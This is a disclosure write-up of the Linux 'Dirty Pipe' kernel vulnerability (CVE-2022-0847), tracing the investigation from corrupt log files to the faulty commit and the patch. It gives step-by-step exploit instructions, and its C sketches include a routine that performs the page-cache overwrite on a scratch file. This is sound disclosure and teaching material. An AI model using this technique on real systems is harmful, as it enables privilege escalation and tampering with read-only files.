The Dirty Pipe Vulnerability
Max Kellermann <email@example.com>
This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.
It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
Corruption pt. I
It all started a year ago with a support ticket about corrupt files. A customer complained that the access logs they downloaded could not be decompressed. And indeed, there was a corrupt log file on one of the log servers; it could be decompressed, but gzip reported a CRC error. I could not explain why it was corrupt, but I assumed the nightly split process had crashed and left a corrupt file behind. I fixed the file’s CRC manually, closed the ticket, and soon forgot about the problem.
Months later, this happened again and yet again. Every time, the file’s contents looked correct, only the CRC at the end of the file was wrong. Now, with several corrupt files, I was able to dig deeper and found a surprising kind of corruption. A pattern emerged.
Let me briefly introduce how our log server works: In the CM4all hosting environment, all web servers (running our custom open source HTTP server) send UDP multicast datagrams with metadata about each HTTP request. These are received by the log servers running Pond, our custom open source in-memory database. A nightly job splits all access logs of the previous day into one per hosted web site, each compressed with zlib.
Via HTTP, all access logs of a month can be downloaded as a single .gz file. Using a trick (which involves Z_SYNC_FLUSH), we can just concatenate all gzipped daily log files without having to decompress and recompress them, which means this HTTP request consumes nearly no CPU. Memory bandwidth is saved by employing the splice() system call to feed data directly from the hard disk into the HTTP connection, without passing the kernel/userspace boundary (“zero-copy”).
Windows users can’t handle .gz files, but everybody can extract ZIP files. A ZIP file is just a container for .gz files, so we could use the same method to generate ZIP files on-the-fly; all we needed to do was send a ZIP header first, then concatenate all .gz file contents as usual, followed by the central directory (another kind of header).
Corruption pt. II
This is how the end of a proper daily file looks:
00 00 ff ff is the sync flush which allows simple concatenation.
03 00 is an empty “final” block, and is followed by a CRC32 (0xf50b129c) and the uncompressed file length (0x00004af7 = 19191 bytes).
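The trailer layout described above can be checked with a few lines of C. This is a minimal sketch, assuming the standard gzip layout in which the last 8 bytes of the file are the CRC32 followed by the uncompressed length, both little-endian; `gzip_trailer`, `load_le32` and `parse_gzip_trailer` are hypothetical names chosen for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Last 8 bytes of a gzip file: CRC32 and uncompressed size, little-endian. */
struct gzip_trailer {
    uint32_t crc32;  /* CRC-32 of the uncompressed data */
    uint32_t isize;  /* uncompressed length modulo 2^32 */
};

/* Decode a 32-bit little-endian value from 4 bytes. */
static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse the trailer from the end of a buffer (hypothetical helper;
   the caller must pass at least the final 8 bytes of the file). */
static struct gzip_trailer parse_gzip_trailer(const unsigned char *buf, size_t len)
{
    assert(buf != NULL && len >= 8);
    struct gzip_trailer t = {
        .crc32 = load_le32(buf + len - 8),
        .isize = load_le32(buf + len - 4),
    };
    return t;
}
```

Fed the bytes 9c 12 0b f5 f7 4a 00 00 (the values quoted above, written out in little-endian order), the helper yields CRC32 0xf50b129c and a length of 19191 bytes.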
The same file but corrupted:
The sync flush is there, the empty final block is there, but the uncompressed length is now 0x0014031e = 1.3 MB (that’s wrong, it’s the same 19 kB file as above). The CRC32 is 0x02014b50, which does not match the file contents. Why? Is this an out-of-bounds write or a heap corruption bug in our log client?
I compared all known-corrupt files and discovered, to my surprise, that all of them had the same CRC32 and the same “file length” value. Always the same CRC - this implies that this cannot be the result of a CRC calculation. With corrupt data, we would see different (but wrong) CRC values. For hours, I stared holes into the code but could not find an explanation.
Then I stared at these 8 bytes. Eventually, I realized that 50 4b is ASCII for “P” and “K”. “PK”, that’s how all ZIP headers start. Let’s have a look at these 8 bytes again:
50 4b is “PK”
01 02 is the code for central directory file header.
“Version made by” = 0x1e = 30 (3.0);
“Version needed to extract” = 0x0014 = 20 (2.0)
The rest is missing; the header was apparently truncated after 8 bytes.
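The same decoding can be written down as code. This is a minimal sketch, assuming the ZIP central directory file header layout (4-byte signature, 2-byte “version made by”, 2-byte “version needed to extract”, all little-endian); the struct and function names are hypothetical. The reading of the upper “version made by” byte as a host system code (3 = UNIX) comes from the ZIP specification, not from the text above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* First 8 bytes of a ZIP central directory file header. */
struct zip_cdfh_prefix {
    uint32_t signature;       /* 0x02014b50, i.e. "PK" 01 02 on disk */
    uint8_t  made_by_version; /* spec version times 10, e.g. 30 = 3.0 */
    uint8_t  made_by_host;    /* host system code; 3 means UNIX */
    uint16_t version_needed;  /* version times 10, e.g. 20 = 2.0 */
};

/* Returns 1 and fills *out if buf starts with a central directory
   file header, otherwise returns 0 and leaves *out untouched. */
static int decode_cdfh_prefix(const unsigned char *buf, size_t len,
                              struct zip_cdfh_prefix *out)
{
    assert(buf != NULL && out != NULL);
    if (len < 8)
        return 0;
    uint32_t sig = (uint32_t)buf[0] | ((uint32_t)buf[1] << 8) |
                   ((uint32_t)buf[2] << 16) | ((uint32_t)buf[3] << 24);
    if (sig != 0x02014b50u)
        return 0;
    out->signature = sig;
    out->made_by_version = buf[4];
    out->made_by_host = buf[5];
    out->version_needed = (uint16_t)(buf[6] | (buf[7] << 8));
    return 1;
}
```

Applied to the 8 bytes that replaced the gzip trailer (50 4b 01 02 1e 03 14 00), this reports version 30 made on host 3 and version 20 needed to extract; applied to the trailer of the intact file, it reports no match.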
This is really the beginning of a ZIP central directory file header; this cannot be a coincidence. But the process which writes these files has no code to generate such a header. In my desperation, I looked at the zlib source code and all other libraries used by that process but found nothing. This piece of software doesn’t know anything about “PK” headers.
There is one process which generates “PK” headers, though; it’s the web service which constructs ZIP files on-the-fly. But this process runs as a different user which doesn’t have write permissions on these files. It cannot possibly be that process.
None of this made sense, but new support tickets kept coming in (at a very slow rate). There was some systematic problem, but I just couldn’t get a grip on it. That gave me a lot of frustration, but I was busy with other tasks, and I kept pushing this file corruption problem to the back of my queue.
Corruption pt. III
External pressure brought this problem back into my consciousness. I scanned the whole hard disk for corrupt files (which took two days), hoping for more patterns to emerge. And indeed, there was a pattern:
there were 37 corrupt files within the past 3 months
they occurred on 22 unique days
18 of those days have 1 corruption
1 day has 2 corruptions (2021-11-21)
1 day has 7 corruptions (2021-11-30)
1 day has 6 corruptions (2021-12-31)
1 day has 4 corruptions (2022-01-31)
The last day of each month is clearly the one on which most corruptions occur.
Only the primary log server had corruptions (the one which served HTTP connections and constructed ZIP files). The standby server (HTTP inactive but same log extraction process) had zero corruptions. Data on both servers was identical, minus those corruptions.
Is this caused by flaky hardware? Bad RAM? Bad storage? Cosmic rays? No, the symptoms don’t look like a hardware issue. A ghost in the machine? Do we need an exorcist?
Man staring at code
I began staring holes into my code again, this time the web service.
Remember, the web service writes a ZIP header, then uses splice() to send all compressed files, and finally uses write() again for the “central directory file header”, which begins with 50 4b 01 02 1e 03 14 00, exactly the corruption. The data sent over the wire looks exactly like the corrupt files on disk. But the process sending this on the wire has no write permissions on those files (and doesn’t even try to do so), it only reads them. Against all odds and against the impossible, it must be that process which causes corruptions, but how?
My first flash of inspiration: why it’s always the last day of the month which gets corrupted. When a website owner downloads the access log, the server starts with the first day of the month, then the second day, and so on. Of course, the last day of the month is sent at the end; the last day of the month is always followed by the “PK” header. That’s why it’s more likely to corrupt the last day. (The other days can be corrupted if the requested month is not yet over, but that’s less likely.)
Man staring at kernel code
After being stuck for more hours, after eliminating everything that was definitely impossible (in my opinion), I drew a conclusion: this must be a kernel bug.
Blaming the Linux kernel (i.e. somebody else’s code) for data corruption must be the last resort. That is unlikely. The kernel is an extremely complex project developed by thousands of individuals with methods that may seem chaotic; despite this, it is extremely stable and reliable. But this time, I was convinced that it must be a kernel bug.
In a moment of extraordinary clarity, I hacked two C programs.
One that keeps writing odd chunks of the string “AAAAA” to a file (simulating the log splitter):
And one that keeps transferring data from that file to a pipe using splice() and then writes the string “BBBBB” to the pipe (simulating the ZIP generator):
I copied those two programs to the log server, and… bingo! The string “BBBBB” started appearing in the file, even though nobody ever wrote this string to the file (only to the pipe by a process without write permissions).
So this really is a kernel bug!
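A rough sketch of what such a pair of test programs could look like, written here as two bounded functions rather than two endless programs. These are not the original listings: the function names, the `rounds` parameter and the 2-byte splice size are assumptions made for illustration.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <unistd.h>

/* "Writer": append the string "AAAAA" to the file `rounds` times
   (a real test program would loop forever). Returns 0 on success. */
static int run_writer(const char *path, int rounds)
{
    assert(path != NULL);
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
    if (fd < 0)
        return -1;
    for (int i = 0; i < rounds; i++) {
        if (write(fd, "AAAAA", 5) != 5) {
            close(fd);
            return -1;
        }
    }
    return close(fd);
}

/* "Splicer": move 2 bytes from the file (opened read-only) into the
   pipe with splice(), then write "BBBBB" into the same pipe. */
static int run_splicer(const char *path, int pipe_wr, int rounds)
{
    assert(path != NULL);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    for (int i = 0; i < rounds; i++) {
        /* NULL offset: splice() advances the file position itself */
        ssize_t n = splice(fd, NULL, pipe_wr, NULL, 2, 0);
        if (n <= 0)
            break;                      /* end of file or error */
        if (write(pipe_wr, "BBBBB", 5) != 5) {
            close(fd);
            return -1;
        }
    }
    close(fd);
    return 0;
}
```

On a correct kernel the reader of the pipe sees file data interleaved with “BBBBB”, and the file itself only ever contains “A” characters. Something has to keep draining the read end of the pipe, otherwise the splicer blocks once the pipe is full.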
All bugs become shallow once they can be reproduced. A quick check verified that this bug affects Linux 5.10 (Debian Bullseye) but not Linux 4.19 (Debian Buster). There are 185,011 git commits between v4.19 and v5.10, but thanks to git bisect, it takes just 17 steps to locate the faulty commit.
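The small step count follows from the halving: every good/bad verdict discards roughly half of the remaining commits, so the number of steps grows with the base-2 logarithm of the range. A minimal sketch of that arithmetic, using a hypothetical helper `bisect_steps` (not part of git; git's own estimate can differ slightly because history is not a straight line):

```c
#include <assert.h>

/* Number of halvings needed to narrow n candidate commits down to one. */
static unsigned bisect_steps(unsigned long n)
{
    assert(n > 0);
    unsigned steps = 0;
    while (n > 1) {
        n /= 2;      /* each verdict discards about half the range */
        steps++;
    }
    return steps;
}
```

For 185,011 commits this gives 17, since 2^17 = 131,072 is the largest power of two that does not exceed the commit count.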
The bisect arrived at commit f6dd975583bd, which refactors the pipe buffer code for anonymous pipe buffers. It changes the way the “mergeable” check is done for pipes.
Pipes and Buffers and Pages
Why pipes, anyway? In our setup, the web service which generates ZIP files communicates with the web server over pipes; it talks the Web Application Socket protocol which we invented because we were not happy with CGI, FastCGI and AJP. Using pipes instead of multiplexing over a socket (like FastCGI and AJP do) has a major advantage: you can use splice() in both the application and the web server for maximum efficiency. This reduces the overhead for having web applications out-of-process (as opposed to running web services inside the web server process, like Apache modules do). This allows privilege separation without sacrificing (much) performance.
Short detour on Linux memory management: The smallest unit of memory managed by the CPU is a page (usually 4 kB). Everything in the lowest layer of Linux’s memory management is about pages. If an application requests memory from the kernel, it will get a number of (anonymous) pages. All file I/O is also about pages: if you read data from a file, the kernel first copies a number of 4 kB chunks from the hard disk into kernel memory, managed by a subsystem called the page cache. From there, the data will be copied to userspace. The copy in the page cache remains for some time, where it can be used again, avoiding unnecessary hard disk I/O, until the kernel decides it has a better use for that memory (“reclaim”). Instead of copying file data to userspace memory, pages managed by the page cache can be mapped directly into userspace using the mmap() system call (a trade-off for reduced memory bandwidth at the cost of increased page faults and TLB flushes). The Linux kernel has more tricks: the sendfile() system call allows an application to send file contents into a socket without a roundtrip to userspace (an optimization popular in web servers serving static files over HTTP). The splice() system call is kind of a generalization of sendfile(): It allows the same optimization if either side of the transfer is a pipe; the other side can be almost anything (another pipe, a file, a socket, a block device, a character device). The kernel implements this by passing page references around, not actually copying anything (zero-copy).
A pipe is a tool for unidirectional inter-process communication. One end is for pushing data into it, the other end can pull that data. The Linux kernel implements this by a ring of struct pipe_buffer, each referring to a page. The first write to a pipe allocates a page (space for 4 kB worth of data). If the most recent write does not fill the page completely, a following write may append to that existing page instead of allocating a new one. This is how “anonymous” pipe buffers work (anon_pipe_buf_ops).
If you, however, splice() data from a file into the pipe, the kernel will first load the data into the page cache. Then it will create a struct pipe_buffer pointing inside the page cache (zero-copy), but unlike anonymous pipe buffers, additional data written to the pipe must not be appended to such a page because the page is owned by the page cache, not by the pipe.
History of the check for whether new data can be appended to an existing pipe buffer:
struct pipe_buf_operations had a flag called can_merge.
Commit 5274f052e7b3 “Introduce sys_splice() system call” (Linux 2.6.16, 2006) featured the splice() system call, introducing a struct pipe_buf_operations implementation for pipe buffers pointing into the page cache, the first one with can_merge unset (not mergeable).
Commit 01e7187b4119 “pipe: stop using ->can_merge” (Linux 5.0, 2019) converted the can_merge flag into a struct pipe_buf_operations pointer comparison because only anon_pipe_buf_ops has this flag set.
Commit f6dd975583bd “pipe: merge anon_pipe_buf*_ops” (Linux 5.8, 2020) converted this pointer comparison to the per-buffer flag PIPE_BUF_FLAG_CAN_MERGE.
Over the years, this check was refactored back and forth, which was okay. Or was it?
Several years before PIPE_BUF_FLAG_CAN_MERGE was born, commit 241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016) added two new functions which allocate a new struct pipe_buffer, but initialization of its flags member was missing. It was now possible to create page cache references with arbitrary flags, but that did not matter. It was technically a bug, though without consequences at that time because all of the existing flags were rather boring.
This bug suddenly became critical in Linux 5.8 with commit f6dd975583bd “pipe: merge anon_pipe_buf*_ops”. By injecting PIPE_BUF_FLAG_CAN_MERGE into a page cache reference, it became possible to overwrite data in the page cache, simply by writing new data into the pipe prepared in a special way.
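The interaction of the stale flag with the merge check is easier to see in a toy model. The following is a userspace simulation only, not kernel code: `toy_pipe`, `toy_buffer`, the 4-entry ring and the `init_flags` switch are all hypothetical stand-ins, and the merge condition is a simplified version of the real check.

```c
#include <assert.h>
#include <string.h>

#define TOY_PAGE_SIZE 4096u
#define TOY_RING_SIZE 4u
#define TOY_CAN_MERGE 0x10u   /* stands in for PIPE_BUF_FLAG_CAN_MERGE */

struct toy_buffer {           /* stands in for struct pipe_buffer */
    unsigned char *page;
    unsigned offset, len, flags;
};

struct toy_pipe {
    struct toy_buffer ring[TOY_RING_SIZE];
    unsigned head, tail;      /* free-running; head - tail = buffers in use */
    unsigned char anon[TOY_RING_SIZE][TOY_PAGE_SIZE];
};

static void toy_init(struct toy_pipe *p) { memset(p, 0, sizeof(*p)); }

/* Like write() on a pipe: append to the newest buffer if it is marked
   mergeable and has room, otherwise start a new anonymous buffer. */
static int toy_write(struct toy_pipe *p, const void *data, unsigned n)
{
    assert(n <= TOY_PAGE_SIZE);
    if (p->head != p->tail) {
        struct toy_buffer *last = &p->ring[(p->head - 1) % TOY_RING_SIZE];
        unsigned end = last->offset + last->len;
        if ((last->flags & TOY_CAN_MERGE) && end + n <= TOY_PAGE_SIZE) {
            memcpy(last->page + end, data, n);  /* whatever page this is */
            last->len += n;
            return 0;
        }
    }
    if (p->head - p->tail == TOY_RING_SIZE)
        return -1;                              /* ring full */
    unsigned slot = p->head % TOY_RING_SIZE;
    struct toy_buffer *buf = &p->ring[slot];
    buf->page = p->anon[slot];
    buf->offset = 0;
    buf->len = n;
    buf->flags = TOY_CAN_MERGE;
    memcpy(buf->page, data, n);
    p->head++;
    return 0;
}

/* Like reading everything: slots are released, their fields stay as they were. */
static void toy_drain(struct toy_pipe *p) { p->tail = p->head; }

/* Like splice() from a file: reference a page cache page without copying.
   init_flags == 0 models the missing initialization, 1 models the fix. */
static int toy_splice(struct toy_pipe *p, unsigned char *cache_page,
                      unsigned offset, unsigned n, int init_flags)
{
    if (p->head - p->tail == TOY_RING_SIZE)
        return -1;
    struct toy_buffer *buf = &p->ring[p->head % TOY_RING_SIZE];
    buf->page = cache_page;
    buf->offset = offset;
    buf->len = n;
    if (init_flags)
        buf->flags = 0;
    p->head++;
    return 0;
}

/* Fill every slot with a full page, then drain: all slots keep TOY_CAN_MERGE. */
static void toy_prime(struct toy_pipe *p)
{
    static const unsigned char zeros[TOY_PAGE_SIZE];
    for (unsigned i = 0; i < TOY_RING_SIZE; i++)
        toy_write(p, zeros, TOY_PAGE_SIZE);
    toy_drain(p);
}
```

After `toy_prime()`, a `toy_splice()` with `init_flags == 0` reuses a slot that still carries the merge flag, so the next `toy_write()` lands in the simulated page cache page right behind the spliced bytes. With `init_flags == 1` the same write goes into a fresh anonymous page and the cache page stays untouched.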
Corruption pt. IV
This explains the file corruption: First, some data gets written into the pipe, then lots of files get spliced, creating page cache references. Randomly, those may or may not have PIPE_BUF_FLAG_CAN_MERGE set. If yes, then the write() call that writes the central directory file header will write into the page cache of the last compressed file.
But why only the first 8 bytes of that header? Actually, all of the header gets copied to the page cache, but this operation does not increase the file size. The original file had only 8 bytes of “unspliced” space at the end, and only those bytes can be overwritten. The rest of the page is unused from the page cache’s perspective (though the pipe buffer code does use it because it has its own page fill management).
And why does this not happen more often? Because the page cache does not write back to disk unless it believes the page is “dirty”. Accidentally overwriting data in the page cache will not make the page “dirty”. If no other process happens to “dirty” the file, this change will be ephemeral; after the next reboot (or after the kernel decides to drop the page from the cache, e.g. reclaim under memory pressure), the change is reverted. This allows interesting attacks without leaving a trace on hard disk.
In my first exploit (the “writer” / “splicer” programs which I used for the bisect), I had assumed that this bug is only exploitable while a privileged process writes the file, and that it depends on timing.
When I realized what the real problem was, I was able to widen the hole by a large margin: it is possible to overwrite the page cache even in the absence of writers, with no timing constraints, at (almost) arbitrary positions with arbitrary data. The limitations are:
the attacker must have read permissions (because it needs to splice() a page into a pipe)
the offset must not be on a page boundary (because at least one byte of that page must have been spliced into the pipe)
the write cannot cross a page boundary (because a new anonymous buffer would be created for the rest)
the file cannot be resized (because the pipe has its own page fill management and does not tell the page cache how much data has been appended)
To exploit this vulnerability, you need to:
Create a pipe.
Fill the pipe with arbitrary data (to set the PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).
Drain the pipe (leaving the flag set in all struct pipe_buffer instances on the ring).
Splice data from the target file (opened with O_RDONLY) into the pipe from just before the target offset.
Write arbitrary data into the pipe; this data will overwrite the cached file page instead of creating a new anonymous pipe buffer.
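The five steps above can be sketched as a self-check that only ever touches a scratch file it creates itself. This is a minimal sketch under stated assumptions, not the author's proof-of-concept: `prepare_pipe`, `scratch_file_check`, the temporary file name and the 4096-byte chunk size are hypothetical choices. On a fixed kernel the check is expected to report that nothing changed.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Steps 2 and 3: fill the pipe to capacity, then read everything back. */
static int prepare_pipe(int p[2])
{
    static char page[4096];
    assert(p != NULL);
    int size = fcntl(p[1], F_GETPIPE_SZ);
    if (size <= 0)
        return -1;
    for (int pass = 0; pass < 2; pass++) {
        for (int left = size; left > 0; ) {
            int n = left < (int)sizeof(page) ? left : (int)sizeof(page);
            ssize_t done = pass == 0 ? write(p[1], page, n)
                                     : read(p[0], page, n);
            if (done != n)
                return -1;
            left -= n;
        }
    }
    return 0;
}

/* Returns 1 if a pipe write changed the scratch file's cached contents,
   0 if the file is unchanged, -1 on error. */
static int scratch_file_check(void)
{
    char path[] = "/tmp/pipe-check-XXXXXX";
    char buf[8];
    loff_t off = 0;
    int p[2] = { -1, -1 }, rfd = -1, result = -1;
    int wfd = mkstemp(path);
    if (wfd < 0)
        return -1;
    rfd = open(path, O_RDONLY);            /* read-only handle, as in step 4 */
    unlink(path);
    if (rfd < 0 || write(wfd, "AAAAAAAA", 8) != 8)
        goto out;
    if (pipe(p) < 0 || prepare_pipe(p) < 0)            /* steps 1 to 3 */
        goto out;
    if (splice(rfd, &off, p[1], NULL, 1, 0) != 1)      /* step 4: byte 0 */
        goto out;
    if (write(p[1], "BBB", 3) != 3)                    /* step 5 */
        goto out;
    if (pread(rfd, buf, sizeof(buf), 0) != (ssize_t)sizeof(buf))
        goto out;
    result = memcmp(buf, "AAAAAAAA", sizeof(buf)) != 0;
out:
    if (p[0] >= 0) {
        close(p[0]);
        close(p[1]);
    }
    if (rfd >= 0)
        close(rfd);
    close(wfd);
    return result;
}
```

Splicing a single byte at offset 0 satisfies the “just before the target offset” condition for a target offset of 1, and the 3-byte write stays well inside the first page, so none of the limitations listed earlier gets in the way.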
To make this vulnerability more interesting, it not only works without write permissions, it also works with immutable files, on read-only btrfs snapshots and on read-only mounts (including CD-ROM mounts). That is because the page cache is always writable (by the kernel), and writing to a pipe never checks any permissions.
This is my proof-of-concept exploit:
Timeline
2021-04-29: first support ticket about file corruption
2022-02-19: file corruption problem identified as Linux kernel bug, which turned out to be an exploitable vulnerability
2022-02-20: bug report, exploit and patch sent to the Linux kernel security team
2022-02-21: bug reproduced on Google Pixel 6; bug report sent to the Android Security Team
2022-02-21: patch sent to LKML (without vulnerability details) as suggested by Linus Torvalds, Willy Tarreau and Al Viro
2022-02-24: Google merges my bug fix into the Android kernel
2022-02-28: notified the linux-distros mailing list
2022-03-07: public disclosure